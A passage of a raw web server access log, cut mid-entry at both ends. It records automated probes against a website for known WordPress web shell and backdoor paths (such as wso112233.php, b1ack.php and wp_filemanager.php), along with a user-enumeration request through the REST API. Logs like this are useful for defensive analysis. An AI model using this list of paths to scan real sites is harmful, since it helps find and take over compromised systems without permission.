[12/Aug/2025:19:30:03 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:19:30:03 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:19:30:03 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:19:30:20 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:19:30:43 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:19:30:44 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:19:30:44 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:19:30:44 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:19:30:58 -0400] "GET /wp-content/uploads/wpr-addons/forms/b1ack.php HTTP/1.1" 301 280 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:31:06 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 264 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:31:08 -0400] "GET /wp-content/themes/twentyfive/include.php HTTP/1.1" 301 275 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:31:19 -0400] "GET /wp-content/plugins/wordpresss3cll/includes.php HTTP/1.1" 301 281 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:31:28 -0400] "GET /wp-content/plugins/beast3x/3xup.php HTTP/1.1" 301 270 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:19:31:29 -0400] "GET /defaults.php HTTP/1.1" 301 247 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:31:49 -0400] "GET /simple.php HTTP/1.1" 301 245 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:31:55 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:31:57 -0400] "GET /install.php HTTP/1.1" 301 246 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:32:19 -0400] "GET /dropdown.php HTTP/1.1" 301 247 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:32:53 -0400] "GET /chosen.php?p= HTTP/1.1" 301 248 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:33:00 -0400] "GET /mah.php HTTP/1.1" 301 242 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:33:29 -0400] "GET /wp-content/plugins/wordpresss3cll/wp-login.php HTTP/1.1" 301 281 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:33:56 -0400] "GET /wp-admin/about.php HTTP/1.1" 301 253 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:34:21 -0400] "GET /wp-content/about.php HTTP/1.1" 301 255 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:34:37 -0400] "GET /wp-includes/rest-api/fields/cache/ HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:34:38 -0400] "GET /wp-admin/install.php HTTP/1.1" 301 255 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:35:11 -0400] "GET /wp-admin/js/about.php7 HTTP/1.1" 301 257 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:35:27 -0400] "GET /wp-content/install.php HTTP/1.1" 301 257 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:35:45 -0400] "GET /wp-content/plugins/core/include.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:35:49 -0400] "GET /wp-admin/user/about.php HTTP/1.1" 301 258 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:36:26 -0400] "GET /wp-includes/install.php HTTP/1.1" 301 258 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:36:33 -0400] "GET /wp-admin/images/admin.php HTTP/1.1" 301 260 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:36:56 -0400] "GET /wp-includes/Text/about.php HTTP/1.1" 301 261 "-" "{random}" 146.190.11.185 - - [12/Aug/2025:19:36:59 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:19:36:59 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:19:36:59 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:19:36:59 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:19:37:14 -0400] "GET /wp-admin/network/admin.php HTTP/1.1" 301 261 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:37:16 -0400] "GET /wp-head.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:37:27 -0400] "GET /wp-admin/maint/atomlib.php HTTP/1.1" 301 261 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:37:47 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 301 261 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:38:21 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 301 263 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:38:30 -0400] "GET /wp-content/uploads/index.php HTTP/1.1" 301 263 "-" "{random}" 66.220.149.113 - - [12/Aug/2025:19:38:43 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 66.220.149.113 - - [12/Aug/2025:19:38:45 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [12/Aug/2025:19:38:51 -0400] "GET /wp-content/themes/twentytwentythree/patterns/index.php HTTP/1.1" 301 289 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:39:03 -0400] "GET /wp-content/themes/twenty/twenty.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:39:24 -0400] "GET /ioxi002.PhP7 HTTP/1.1" 301 247 "-" "{random}" 69.171.231.1 - - [12/Aug/2025:19:39:45 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [12/Aug/2025:19:40:05 -0400] "GET /ynz.PhP7 HTTP/1.1" 301 243 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:40:16 -0400] "GET /themes.php HTTP/1.1" 301 245 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:40:44 -0400] "GET /erin1.PhP7 HTTP/1.1" 301 245 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:41:22 -0400] "GET /wp-admin/maint/about.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:42:17 -0400] "GET /fosil.php HTTP/1.1" 301 244 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:42:20 -0400] "GET /ws.php.php HTTP/1.1" 301 245 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:42:53 -0400] "GET /ws.php HTTP/1.1" 301 241 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:43:02 -0400] "GET /wp-admin/user/wp-login.php HTTP/1.1" 301 261 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:43:10 -0400] "GET /wp-includes/images/wp-login.php HTTP/1.1" 301 266 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:43:18 -0400] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:43:27 -0400] "GET //?rest_route=/wp/v2/users HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:43:49 -0400] "GET /wp-admin/wp-login.php HTTP/1.1" 301 256 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:43:55 -0400] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:44:19 -0400] "GET /wp-includes/wp-login.php HTTP/1.1" 301 259 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:44:21 -0400] "GET /cgi-bin/wp-login.php HTTP/1.1" 301 255 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:44:35 -0400] "GET /.wp-cli/wp-login.php HTTP/1.1" 301 255 "-" "{random}" 94.16.113.252 - - [12/Aug/2025:19:45:07 -0400] "GET /wp-content/uploads/wp-login.php HTTP/1.1" 301 266 "-" "{random}" 68.183.245.101 - - [12/Aug/2025:19:45:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:19:45:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:19:45:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:19:45:12 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:19:45:42 -0400] "GET /wp-content/plugins/work-list/lang.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:45:54 -0400] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:46:04 -0400] "GET /fm1.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:46:18 -0400] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:46:31 -0400] "GET /my1.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:46:51 -0400] "GET /wso112233.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:19:47:14 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:19:47:14 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:19:47:14 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:19:47:15 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:19:47:52 -0400] "GET /wp-includes/random_compat/about.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:48:09 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:48:47 -0400] "GET /wp-includes/SimplePie/index.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:48:48 -0400] "GET /cgi-bin/my1.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:48:57 -0400] "GET /M1.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:51:34 -0400] "GET /wp-includes/inputs.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:52:43 -0400] "GET /bala.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:19:53:45 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:19:55:12 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:19:55:12 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:19:55:12 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:19:55:12 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:19:57:47 -0400] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:20:00:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:20:00:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:20:00:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:20:00:22 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 86.8.204.43 - - [12/Aug/2025:20:00:30 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:20:00:30 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:20:00:30 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:20:00:30 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:20:01:49 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:20:01:49 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:20:01:49 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:20:01:49 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 172.192.59.58 - - [12/Aug/2025:20:05:14 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 279 "-" "-" 172.192.59.58 - - [12/Aug/2025:20:05:15 -0400] "GET /file18.php HTTP/1.1" 301 241 "-" "-" 172.192.59.58 - - [12/Aug/2025:20:05:15 -0400] "GET /file14.php HTTP/1.1" 301 241 "-" "-" 172.192.59.58 - - [12/Aug/2025:20:05:15 -0400] "GET /file15.php HTTP/1.1" 301 241 "-" "-" 172.192.59.58 - - [12/Aug/2025:20:05:16 -0400] "GET /file19.php HTTP/1.1" 301 241 "-" "-" 172.192.59.58 - - [12/Aug/2025:20:05:16 -0400] "GET /file16.php HTTP/1.1" 301 241 "-" "-" 172.192.59.58 - - [12/Aug/2025:20:05:16 -0400] "GET /file17.php HTTP/1.1" 301 241 "-" "-" 172.192.59.58 - - [12/Aug/2025:20:05:16 -0400] "GET /file12.php HTTP/1.1" 301 241 "-" "-" 172.192.59.58 - - [12/Aug/2025:20:05:17 -0400] "GET /file11.php HTTP/1.1" 301 241 "-" "-" 172.192.59.58 - - [12/Aug/2025:20:05:17 -0400] "GET /file13.php HTTP/1.1" 301 241 "-" "-" 146.190.11.185 - - [12/Aug/2025:20:05:46 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:20:05:46 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:20:05:46 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:20:05:46 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:20:08:01 -0400] "GET /wp-includes/SimplePie/file.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:13:19 -0400] "GET /xmrlpc.php?p= HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [12/Aug/2025:20:14:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:20:14:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:20:14:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:20:14:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:20:17:44 -0400] "GET /wp-content/plugins/wp-help/admin/wp-fclass.php HTTP/1.1" 301 281 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:20:17:53 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:20:17:54 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:20:17:54 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:20:17:54 -0400] "GET /it/ HTTP/1.1" 